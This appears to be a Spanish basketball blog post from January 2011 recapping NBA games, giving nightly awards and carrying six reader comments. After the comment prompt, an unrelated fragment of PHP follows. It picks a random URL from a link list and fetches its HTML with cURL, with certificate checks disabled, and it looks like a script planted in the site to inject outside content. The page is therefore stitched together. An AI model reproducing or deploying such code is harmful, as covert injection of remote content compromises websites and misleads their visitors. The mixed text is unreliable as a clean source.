La Crónica (29/01/2011)

30 de January de 2011 por txusma

Los Spurs se convierten en el primer equipo que llega a las 40 victorias y lo hace a un ritmo enloquecido, más rápido que cualquiera de las temporadas en que se proclamaron campeones. De la mano de un Ginobili en estado de gracia se impusieron a los Rockets 95-108. Veremos si su excelente balance resiste su anual Rodeo Road Trip, 3 semanas con 9 partidos consecutivos fuera de casa. A pesar que de estos 9 partidos tan sólo 3 son contra equipos con balance positivo, será una buena piedra de toque para el mejor equipo de la liga.

Sus perseguidores siguen avanzando 2 pasos y retrociendo 1. Atlanta se dejó en Dallas un partido que tenía muy controlado al inicio del último cuarto (91-102). Un último arreón de Nowitzki y Terry dio la victoria a la tejanos que han ganado 5 de sus últimos 6 partidos con el alemán todavía renqueante. Por los Hawks no jugó Marvin Williams, suspendido 2 partidos por sacar a relucir sus dotes boxeadoras en el partido frente los Knicks. Chicago, en cambio, está en fase de dar muchos pasos hacia adelante y muy seguidos. Con su victoria de ayer frente los Pacers (89-110) suma ya un 11-0 frente rivales de su división. Con Rose en baja forma debido a 2 úlceras de estómago fue Carlos Boozer el que lideró a su equipo al tercer puesto de la liga.

De los equipos en positivo el que se estrelló de verdad anoche fue New Orleans que cayó ante los Kings (96-102), masacrado por un Demarcus Cousins que empieza a dar miedito. Segunda victoria consecutiva de prestigio para los de Whestpal. Veremos que consiguen ante Celtics y Spurs.

En los partidos de la zona baja, victoria de los Grizzlies frente los Wizards (93-107) con un Zach Randolph quemando sus últimos cartuchos para ir al All Stars; victoria de los Wolves frente los Raptors (87-103) con Bargani superado por todas partes por Kevin Love; victoria también de los Bucks contra los Nets (81-91) en el retorno de Brandon Jennings; y victoria también de los Clippers frente los Bobcats (88-103) con el trigésimo octavo doble-doble de Blake Griffin en 46 partidos.

PREMIOS

MVP: 24 puntos y 20 rebotes para intentar convencer a los entrenadores que Zach Randolph se merece ir al All Stars. Necesitará muchas actuaciones como estas en los próximos días para dejar fuera a gente como Love, Griffin, Nowitzki o Duncan.

Rookie: Por méritos própios, Demarcus Cousins le come la tostada a Blake Griffin. El primero se fue a los 25 puntos, 12 rebotes y 7 asistencias mientras que el segundo se quedó en 24 puntos, 10 rebotes y 3 asistencias. Vigilancia especial para Ed Davis que fue de lo poquito a salvar en los Raptors con 15 puntos y 11 rebotes.

Sorpresa: Josh McRoberts volvió a la titularidad debido a la ausencia de Tyler Hansbrough y lo aprovechó convenientemente con 20 puntos y 8 rebotes. La batalla entre estos 2 por la titularidad continúa abierta.

Decepción: 5 de 24 para Andrea Bargnani. Y se supone que él es la estrella indiscutible del equipo…

Esfuerzo en vano: Joe Johnson fue el alfa y el omega de los Hawks (como casi siempre) pero sus 27 puntos, 6 asistencias y 8 rebotes no fueron suficienets para llevarse el partido frente los Mavs.

Imágenes | AP Photo/Getty Images

Comenta

6 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Cousins tiene cualidades para ser un center impresionante, si realmente tiene la cabeza centrada puede ser un jugador franquicia para Sacramento, junto a un Tyreke sano son una buena base sobre la que construir.

      Citar

  2. HeiNeKeN dice:
    #2

    Buen partido de Foye y Gomes en anotación sustiuyendo al lesionado Eric Gordon.

      Citar

  3. Vader dice:
    #3

    Si que da miedito el Cousins este si… Como dice Viva_Dirk si Tyreke se pone en forma y Cousins madura un poco su caracter los Kings ya tienen una pareja sobre la que construir un equipo ganador y muy atractivo.

    Saludos.

      Citar

  4. Sancho88 dice:
    #4

    pero es de valorar el esfuerzo de los Kings. Están consiguiendo que les metan 15-20 puntos menos por partido en los últimos 4 o 5 partidos, y eso para un equipo totalmente desauciado tiene mérito. además han roto la racha de los Hornets, que ya andaba por las 10 victorias consecutivas. Hay dos cosas claras, los equipos de arriba se relajan a mitad de temporadas contra equipos como Sacramento, Minnesotta o Nueva Jersey, y por ahí siempre se dan sorpresas, pero realmente también se comienza a ver la calidad de algunos jugadores, como por ejemplo Cousins. Me parece que está teniendo una aclimatación muy adecuada a esta liga, que no va de estrella para nada y que lo único que tiene que hacer para ganarse un puesto entre los cinco mejores ‘5’ de la liga en los próximos años es llamar a la psicóloga de Artest, xd. es coña.
    Es solo un rookie, pero con muy buena pinta. Vaya calidad de Kentucky con él y Wall. Dos grandes perlas para esta liga

      Citar

  5. Denise dice:
    #5

    Pues House acaba de decidir el partido para Heat. Los unicos 5 puntos que ha metido son los que ha decidido la victoria para Miami.
    Y ahora toca ver el Lakers – Celtics, en el cual Kobe ha empezado enchufado pero le acaban de pitar la segunda falta personal…

      Citar

  6. Denise dice:
    #6

    Al descanso, Kobe y Pierce haciendo lo que les da la gana.
    Where is Artest?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>